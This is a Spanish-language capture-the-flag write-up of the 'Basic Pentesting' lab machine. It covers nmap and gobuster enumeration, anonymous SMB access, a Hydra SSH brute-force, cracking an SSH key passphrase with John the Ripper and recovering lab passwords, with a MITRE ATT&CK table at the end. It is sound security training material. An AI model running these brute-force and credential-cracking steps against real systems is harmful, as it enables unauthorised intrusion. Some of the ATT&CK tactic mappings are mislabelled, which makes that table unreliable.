Basic Pentesting

1. Información General

  • Fecha del análisis: 11 de marzo de 2025

  • Host Objetivo: basic.thm (10.10.30.13)

  • Sistema Operativo Detectado: Linux (Ubuntu 16.04.4 LTS) con Samba y Apache Tomcat

  • Metodología Utilizada:

    • Escaneo de puertos con Nmap

    • Enumeración de directorios con Gobuster

    • Acceso a comparticiones SMB

    • Revisión de archivos disponibles

    • Ataque de fuerza bruta a SSH con Hydra

    • Descifrado de clave privada con John the Ripper

    • Autenticación exitosa en el sistema objetivo

    • Obtención de credenciales privilegiadas

2. Descubrimiento y Enumeración

nmap -A -oN basic.txt basic.thm

Escaneo de Servicios (Nmap)

Se detectaron los siguientes servicios en el sistema objetivo:

Puerto

Estado

Servicio

Versión

22/tcp

open

SSH

OpenSSH 7.2p2 Ubuntu 4ubuntu2.4

80/tcp

open

HTTP

Apache httpd 2.4.18 (Ubuntu)

139/tcp

open

NetBIOS-SSN

Samba smbd 3.X - 4.X (WORKGROUP)

445/tcp

open

NetBIOS-SSN

Samba smbd 4.3.11-Ubuntu (WORKGROUP)

8009/tcp

open

AJP13

Apache JServ Protocol 1.3

8080/tcp

open

HTTP Proxy

Apache Tomcat 9.0.7

Posibles vulnerabilidades:

  • Apache Struts 2.5.12: Indicado en archivos internos. Versiones antiguas de Struts son conocidas por vulnerabilidades de ejecución remota de código (RCE) [T1190 - Exploit Public-Facing Application].

3. Enumeración de Directorios Web (Gobuster)

gobuster dir -u http://basic.thm -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 50 
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://basic.thm
[+] Method:                  GET
[+] Threads:                 50
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s

Se realizó un escaneo de directorios en el servidor web, encontrando:

Directorio

Estado

/development

301 (Redirección)

/server-status

403 (Acceso denegado)

Archivos Encontrados en /development

captura de la ruta development

Se encontraron dos archivos de texto relevantes:

j.txt

For J:

I've been auditing the contents of /etc/shadow to make sure we don't have any weak credentials,
and I was able to crack your hash really easily. You know our password policy, so please follow
it? Change that password ASAP.

-K

dev.txt

2018-04-23: I've been messing with that struts stuff, and it's pretty cool! I think it might be neat
to host that on this server too. Haven't made any real web apps yet, but I have tried that example
you get to show off how it works (and it's the REST version of the example!). Oh, and right now I'm 
using version 2.5.12, because other versions were giving me trouble. -K

2018-04-22: SMB has been configured. -K

2018-04-21: I got Apache set up. Will put in our content later. -J

Posible explotación:

  • j.txt indica que el usuario "J" tiene una contraseña débil en /etc/shadow y que pudo ser crackeada fácilmente. Esto sugiere que podría haber credenciales débiles en el sistema.

  • dev.txt confirma que Apache Struts 2.5.12 está instalado y en uso, lo que representa una vulnerabilidad grave si no está actualizado.

4. Acceso a Comparticiones SMB

 smbclient -L  //10.10.30.13       
Password for [WORKGROUP\kali]:

        Sharename       Type      Comment
        ---------       ----      -------
        Anonymous       Disk      
        IPC$            IPC       IPC Service (Samba Server 4.3.11-Ubuntu)
Reconnecting with SMB1 for workgroup listing.

        Server               Comment
        ---------            -------

        Workgroup            Master
        ---------            -------
        WORKGROUP            BASIC2

Se encontraron las siguientes carpetas compartidas en el servidor SMB:

Recurso

Tipo

Comentario

Anonymous

Disk

Acceso sin autenticación

IPC$

IPC

Servicio de IPC Samba

El acceso anónimo a SMB representa un riesgo de seguridad, ya que permite a cualquier usuario listar y descargar archivos sin autenticación.

Archivos Recuperados

┌──(kali㉿kali)-[~]
└─$ smbclient //10.10.30.13/Anonymous -p 445 -U guest

Password for [WORKGROUP\guest]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Thu Apr 19 13:31:20 2018
  ..                                  D        0  Thu Apr 19 13:13:06 2018
  staff.txt                           N      173  Thu Apr 19 13:29:55 2018

                14318640 blocks of size 1024. 11073416 blocks available
smb: \> get staff.txt
getting file \staff.txt of size 173 as staff.txt (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)

Se encontró un archivo en la carpeta "Anonymous":

Archivo: staff.txt

Announcement to staff:

PLEASE do not upload non-work-related items to this share. I know it's all in fun, but
this is how mistakes happen. (This means you too, Jan!)

-Kay

Posible explotación:

  • "Kay" parece ser un usuario con permisos administrativos que gestiona SMB.

  • "Jan" podría ser un usuario del sistema con archivos o credenciales mal gestionadas.

  • La nota sugiere que en el pasado se subieron archivos no autorizados, lo que indica la posibilidad de encontrar archivos sensibles o credenciales en esta compartición.

5. Ataque de Fuerza Bruta a SSH

Se realizó un ataque de fuerza bruta con Hydra contra el servicio SSH, resultando en credenciales válidas:

grep -E '^.{7}$' /usr/share/seclists/Passwords/Leaked-Databases/rockyou-75.txt > xato-7.txt

hydra -l jan -P xato-7.txt ssh://10.10.30.13 -t 4

Usuario

Contraseña Encontrada

jan

armando

Posible explotación:

  • El usuario "jan" tiene una contraseña débil que pudo ser descubierta mediante ataque de fuerza bruta.

  • Esto permite acceso al sistema vía SSH, lo que puede facilitar una escalación de privilegios o movimientos laterales dentro de la red.

6. Análisis de Archivos y Escalación de Privilegios

Se identificaron los siguientes elementos dentro del sistema tras la autenticación vía SSH:

Archivos de Interés

Contenido de /home/Kay/.ssh

Archivo

Descripción

id_rsa

Posible clave privada de Kay.

id_rsa.pub

Clave pública asociada a la privada.

authorized_keys

Define qué claves públicas pueden autenticarse en el sistema.

Errores de permisos en la clave privada

Una vez copiado la clave privada debía restringirse con:

chmod 600 id_rsa.pem

Descifrado de Clave Privada

Se utilizó John the Ripper para descifrar la clave privada con el diccionario rockyou.txt:

python3 /usr/share/john/ssh2john.py id_rsa > rsa_hash.txt
john --wordlist=rockyou.txt rsa_hash.txt

Resultado:

beeswax          (Kay.pem)

Acceso con la Clave Privada Descifrada

Se utilizó la clave privada descifrada para autenticarse como el usuario kay:

ssh -i Kay.pem kay@10.10.225.117

Resultado: Se ingresó la passphrase beeswax, logrando acceso al usuario kay.

Obtención de Credenciales Finales

Dentro del directorio de kay, se encontró un archivo llamado pass.bak:

cat pass.bak

Contenido:

heresareallystrongpasswordthatfollowsthepasswordpolicy$$

7. Análisis MITRE ATT&CK

Táctica

Técnica

Descripción

Reconocimiento

T1046 - Escaneo de Red

Se identificaron servicios con Nmap.

Acceso Inicial

T1110 - Brute Force

Fuerza bruta en SSH con Hydra.

Persistencia

T1552 - Unsecured Credentials

Credenciales débiles encontradas en j.txt.

Escalada de Privilegios

T1078 - Valid Accounts

Uso de credenciales obtenidas para acceder como "kay".

Ejecución

T1190 - Exploit Public-Facing Application

Posible explotación de Apache Struts 2.5.12.

AnteriorAttacktive DirectorySiguienteBiling

Última actualización